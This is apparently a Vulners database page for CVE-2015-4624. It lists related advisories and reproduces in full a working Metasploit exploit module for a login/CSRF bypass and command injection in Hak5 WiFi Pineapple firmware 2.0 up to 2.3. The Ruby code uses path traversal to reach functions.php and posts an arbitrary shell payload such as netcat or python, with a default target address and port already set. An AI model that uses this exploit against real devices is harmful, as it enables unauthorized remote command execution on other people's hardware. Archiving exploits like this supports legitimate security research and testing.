Vulners
Lucene search
Hak5 WiFi Pineapple Preconfiguration Command Injection
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Hak5 WiFi Pineapple Preconfiguration Command Injection 2 | 19 Oct 201600:00 | – | zdt |
 | CVE-2015-4624 | 20 Oct 201600:00 | – | circl |
 | Hak5 WiFi Pineapple Pre-Configured Command Injection Vulnerability | 5 Apr 201700:00 | – | cnvd |
 | CVE-2015-4624 | 31 Mar 201715:00 | – | cve |
 | CVE-2015-4624 | 31 Mar 201715:00 | – | cvelist |
 | Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit) | 20 Oct 201600:00 | – | exploitdb |
 | Hak5 WiFi Pineapple Preconfiguration Command Injection | 7 Sep 201600:18 | – | metasploit |
 | CVE-2015-4624 | 31 Mar 201716:59 | – | nvd |
 | WiFi Pineapple Predictable CSRF Token | 12 Aug 201500:00 | – | packetstorm |
| Hak5 WiFi Pineapple Preconfiguration Command Injection 2 | 19 Oct 201600:00 | – | packetstorm |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
'Description' => %q{
This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
These devices may typically be identified by their SSID beacons of 'Pineapple5_....';
Provided as part of the TospoVirus workshop at DEFCON23.
},
'Author' => ['catatonicprime'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-4624' ]
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'Space' => 2048,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic python netcat telnet'
}
},
'Targets' =>
[
[ 'WiFi Pineapple 2.0.0 - 2.3.0', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2015-08-01'))
register_options(
[
OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]),
Opt::RPORT(1471),
Opt::RHOST('172.16.42.1')
]
)
deregister_options(
'ContextInformationFile',
'DOMAIN',
'DigestAuthIIS',
'EnableContextEncoding',
'FingerprintCheck',
'HttpClientTimeout',
'NTLM::SendLM',
'NTLM::SendNTLM',
'NTLM::SendSPN',
'NTLM::UseLMKey',
'NTLM::UseNTLM2_session',
'NTLM::UseNTLMv2',
'SSL',
'SSLVersion',
'VERBOSE',
'WORKSPACE',
'WfsDelay',
'Proxies',
'VHOST'
)
end
def cmd_uri
normalize_uri('includes', 'css', 'styles.php', '../../..', target_uri.path)
end
def cmd_inject(cmd)
res = send_request_cgi(
'method' => 'POST',
'uri' => cmd_uri,
'vars_get' => {
'execute' => "" # Presence triggers command execution
},
'vars_post' => {
'commands' => cmd
})
res
end
def check
res = cmd_inject("echo")
if res && res.code == 200 && res.body =~ /Executing/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
print_status('Attempting to bypass login/csrf checks...')
unless check
fail_with(Failure::NoAccess, 'Failed to bypass login/csrf check...')
end
print_status('Executing payload...')
cmd_inject("#{payload.encoded}")
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
0.4Low risk
Vulners AI Score0.4
CVSS 24.3
CVSS 37.5
EPSS0.4762